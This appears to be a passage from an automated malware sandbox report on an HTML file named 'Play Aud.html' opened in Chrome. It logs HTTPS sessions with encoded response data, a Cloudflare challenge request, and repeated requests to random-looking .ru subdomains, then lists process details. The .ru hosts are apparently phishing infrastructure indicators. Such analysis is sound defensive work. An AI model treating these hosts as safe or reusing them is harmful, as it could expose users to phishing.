                                                                                                    Data Ascii: CF-RAY: 8f6a517519567c8a-EWRalt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:12:09 UTC1333INData Raw: 6d 48 71 44 6b 34 75 77 68 37 79 53 77 34 2b 36 6e 5a 47 58 78 4c 47 61 6d 72 6a 4f 75 64 43 68 69 4b 66 4d 70 5a 2b 71 6b 63 76 42 75 38 50 48 7a 74 66 61 32 74 76 66 77 36 79 38 77 37 54 47 77 4d 65 34 76 4d 69 35 70 38 58 52 77 4d 7a 50 31 4e 37 4e 30 50 54 4e 39 4d 6e 38 30 75 65 34 75 76 7a 69 30 76 7a 6a 42 2b 54 48 2b 4f 4c 43 77 2b 62 71 30 4d 72 73 33 2b 54 71 43 41 34 58 37 76 62 38 35 50 58 70 2b 42 6b 4f 34 74 33 7a 33 76 6b 5a 42 43 76 70 47 51 62 6c 37 69 45 41 43 79 67 66 4d 44 63 6a 41 77 30 36 4a 51 38 6c 50 78 4e 42 4c 66 6f 59 50 53 30 68 47 42 49 70 52 44 55 57 54 45 59 6a 49 69 34 70 45 69 67 4e 4a 43 6b 58 49 78 5a 63 4e 54 77 39 4b 6b 46 4d 4c 6b 46 52 52 6b 63 30 4b 44 46 57 51 56 59 31 52 45 55 6e 5a 30 4a 47 64 54 4a 6b 5a 56 6b
                                                                                                    Data Ascii: mHqDk4uwh7ySw4+6nZGXxLGamrjOudChiKfMpZ+qkcvBu8PHztfa2tvfw6y8w7TGwMe4vMi5p8XRwMzP1N7N0PTN9Mn80ue4uvzi0vzjB+TH+OLCw+bq0Mrs3+TqCA4X7vb85PXp+BkO4t3z3vkZBCvpGQbl7iEACygfMDcjAw06JQ8lPxNBLfoYPS0hGBIpRDUWTEYjIi4pEigNJCkXIxZcNTw9KkFMLkFRRkc0KDFWQVY1REUnZ0JGdTJkZVk
                                                                                                    2024-12-23 18:12:09 UTC1369INData Raw: 59 39 66 59 49 4b 54 6f 6e 6d 41 6c 6f 31 6e 72 4a 36 6f 6c 4c 4f 69 72 6f 47 41 70 35 74 31 68 36 35 35 72 6f 43 72 71 6f 32 76 74 6f 47 7a 71 4c 79 62 6d 70 58 4b 69 70 7a 4c 77 37 4b 63 7a 64 4f 54 74 4e 4c 45 71 61 6e 4d 7a 62 4b 78 7a 4e 2b 64 6f 39 72 57 34 4c 33 44 33 38 71 6b 79 4e 37 69 33 38 66 70 36 63 48 47 35 4d 62 41 2b 4f 2f 77 2b 76 4c 30 39 4c 6e 4b 37 62 7a 51 42 76 62 59 37 39 54 35 36 66 50 2b 41 4f 2f 70 30 41 4c 68 37 4d 73 47 43 38 33 6c 43 52 50 35 36 78 44 76 32 50 63 58 41 79 54 2b 47 50 6a 77 33 69 49 69 39 66 73 74 2f 51 49 67 49 65 38 47 4a 79 76 7a 43 69 49 6a 44 78 6b 35 4d 54 62 38 46 44 45 52 4d 52 49 31 41 79 49 32 4b 77 63 6e 47 54 6f 4b 53 30 64 49 53 68 51 4d 55 78 4a 55 4c 6b 73 61 4d 56 56 47 56 42 31 56 55 55 49 31
                                                                                                    Data Ascii: Y9fYIKTonmAlo1nrJ6olLOiroGAp5t1h655roCrqo2vtoGzqLybmpXKipzLw7KczdOTtNLEqanMzbKxzN+do9rW4L3D38qkyN7i38fp6cHG5MbA+O/w+vL09LnK7bzQBvbY79T56fP+AO/p0ALh7MsGC83lCRP56xDv2PcXAyT+GPjw3iIi9fst/QIgIe8GJyvzCiIjDxk5MTb8FDERMRI1AyI2KwcnGToKS0dIShQMUxJULksaMVVGVB1VUUI1
                                                                                                    2024-12-23 18:12:09 UTC1369INData Raw: 74 70 67 33 6d 44 61 6f 6c 38 63 33 78 77 6f 6f 32 42 6c 62 4f 4e 65 58 71 53 68 34 6d 51 73 59 74 37 70 70 4f 54 77 5a 32 56 6c 38 65 66 71 5a 2f 44 71 35 33 47 71 4b 71 78 77 71 57 72 74 4a 4c 51 73 72 69 37 33 37 36 2f 34 73 53 36 73 73 65 69 77 73 54 61 31 4d 76 66 72 39 6a 47 71 71 71 73 30 64 43 75 34 73 7a 44 37 75 62 53 32 76 6e 37 33 63 38 43 76 74 6e 32 76 39 58 64 77 75 54 6b 35 4d 62 76 43 75 76 77 38 38 7a 6f 38 41 50 77 39 42 7a 7a 43 66 41 67 36 39 7a 79 2f 41 54 57 42 42 67 69 33 2f 30 47 48 77 51 50 2b 2f 63 62 42 50 73 7a 4a 77 6f 55 4e 68 49 50 42 50 49 78 47 77 77 33 48 52 45 31 2b 79 49 63 45 77 67 71 46 30 77 55 43 69 70 42 4f 6b 6f 68 52 44 35 4b 4c 30 70 58 54 43 77 6b 46 30 55 77 58 7a 77 64 4d 44 77 62 58 55 64 59 50 47 63 2f 4f
                                                                                                    Data Ascii: tpg3mDaol8c3xwoo2BlbONeXqSh4mQsYt7ppOTwZ2Vl8efqZ/Dq53GqKqxwqWrtJLQsri7376/4sS6sseiwsTa1Mvfr9jGqqqs0dCu4szD7ubS2vn73c8Cvtn2v9XdwuTk5MbvCuvw88zo8APw9BzzCfAg69zy/ATWBBgi3/0GHwQP+/cbBPszJwoUNhIPBPIxGww3HRE1+yIcEwgqF0wUCipBOkohRD5KL0pXTCwkF0UwXzwdMDwbXUdYPGc/O
                                                                                                    2024-12-23 18:12:09 UTC401INData Raw: 79 6a 36 6d 4a 71 4b 31 7a 69 4a 57 44 70 35 36 76 6b 38 43 53 77 71 53 55 70 4c 61 6e 75 36 62 4a 6c 4a 36 63 70 38 71 68 72 4a 37 4f 71 61 50 46 79 63 47 30 74 73 6e 45 71 39 33 5a 79 62 76 68 33 63 4f 2f 77 4d 50 51 75 4e 7a 70 7a 62 76 67 33 65 54 41 75 36 76 48 78 74 4c 31 34 73 66 44 73 75 2f 4d 78 2f 58 72 32 2f 4c 67 32 64 4d 48 36 4e 7a 6a 30 38 66 65 32 67 34 4b 2b 74 2f 4a 43 76 54 6a 46 68 59 4e 39 4f 59 50 37 66 63 4f 43 67 6b 61 39 76 55 55 2b 65 62 2b 42 76 6b 70 4a 2f 51 45 43 75 63 5a 43 77 38 55 43 4f 38 4d 36 54 6b 6e 44 54 76 34 4e 79 63 33 38 69 38 56 52 45 55 79 4d 42 5a 46 51 68 70 41 52 52 30 6b 44 41 6f 73 53 30 77 6f 44 56 55 6d 45 43 4e 48 54 6a 34 34 53 6a 6b 65 50 6c 77 79 48 32 49 30 4f 6c 46 4a 4f 55 52 46 50 56 42 59 55 47
                                                                                                    Data Ascii: yj6mJqK1ziJWDp56vk8CSwqSUpLanu6bJlJ6cp8qhrJ7OqaPFycG0tsnEq93Zybvh3cO/wMPQuNzpzbvg3eTAu6vHxtL14sfDsu/Mx/Xr2/Lg2dMH6Nzj08fe2g4K+t/JCvTjFhYN9OYP7fcOCgka9vUU+eb+BvkpJ/QECucZCw8UCO8M6TknDTv4Nyc38i8VREUyMBZFQhpARR0kDAosS0woDVUmECNHTj44SjkePlwyH2I0OlFJOURFPVBYUG


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    24192.168.2.549797104.18.95.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:12:10 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1393713427:1734973920:IGGTGv2DpmF5sqrbzrIYjBSY0pPbZJChLraQ65P8WNY/8f6a50df68a942a0/BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:12:11 UTC379INHTTP/1.1 404 Not Found
                                                                                                    Date: Mon, 23 Dec 2024 18:12:11 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 7
                                                                                                    Connection: close
                                                                                                    cf-chl-out: 2Q+PRMCvEXayY0jHeLzuOuJUfG03rfg889g=$9gXEGOf+DnzeDr43
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a51816e685e78-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:12:11 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                    Data Ascii: invalid


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    25192.168.2.549804104.21.65.724434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:12:12 UTC655OUTGET /nejzxkuqjpqdsbwvvlPGTTotglnBJTRZLTDTUZEXJFIBYNSYMQMZBTQ HTTP/1.1
                                                                                                    Host: myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Origin: https://n6b.kolivane.ru
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://n6b.kolivane.ru/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:12:13 UTC906INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:12:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Dl3LsNKVg9l8n82CahJlcRuoSi5pagD8ep8LtjThEQa7PuHt%2BxR0QU3noGEyfGbv8imxK1lW7NAcKnDapVVCkPHp4chiZOZkK%2BZIZgU%2BxUq5MkR29UgkS%2FSN7eteaC4GxuqwBc%2F1LHAszkKI8%2BpGwd90R1YVK7LRNdN4HF8r6iglInsXRR4PsiEiu4trTfxmYh7jj%2Fd1I4%2F2T8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a518bdb5343f7-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1624&rtt_var=615&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1233&delivery_rate=1798029&cwnd=213&unsent_bytes=0&cid=cae220c531ca63bd&ts=888&x=0"
                                                                                                    2024-12-23 18:12:13 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                    Data Ascii: 11
                                                                                                    2024-12-23 18:12:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    26192.168.2.549816172.67.189.384434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:12:15 UTC451OUTGET /nejzxkuqjpqdsbwvvlPGTTotglnBJTRZLTDTUZEXJFIBYNSYMQMZBTQ HTTP/1.1
                                                                                                    Host: myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:12:16 UTC906INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:12:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BDdb1ADl5KuUq0OlszFQd78fKysv0MuJ5SheaoA7YbXO5t8Vt8UdVCk5nk4%2FL146x17a%2FQMzeTTXjTYy8mzolvO8ck%2FrjIJDHotX9Yh5%2BFI%2BySOD4SZ6QEHZ0bubmb73Ii4E8xUlxQojZBatpRVWQxhdiOhWuuCY0wiOoG%2Fltg9o7wo%2FOxLPatg6QyJ02J%2FFGDbykxHk0TJEtF0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a51a1b87c43b6-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1609&rtt_var=701&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1029&delivery_rate=1459270&cwnd=224&unsent_bytes=0&cid=6d6209bcfa89fe19&ts=889&x=0"
                                                                                                    2024-12-23 18:12:16 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                    Data Ascii: 11
                                                                                                    2024-12-23 18:12:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:13:11:30
                                                                                                    Start date:23/12/2024
                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Play Aud.html"
                                                                                                    Imagebase:0x7ff715980000
                                                                                                    File size:3'242'272 bytes
                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:2
                                                                                                    Start time:13:11:33
                                                                                                    Start date:23/12/2024
                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1988,i,1515091250345096605,12797661667219854330,262144 /prefetch:8
                                                                                                    Imagebase:0x7ff715980000
                                                                                                    File size:3'242'272 bytes
                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    No disassembly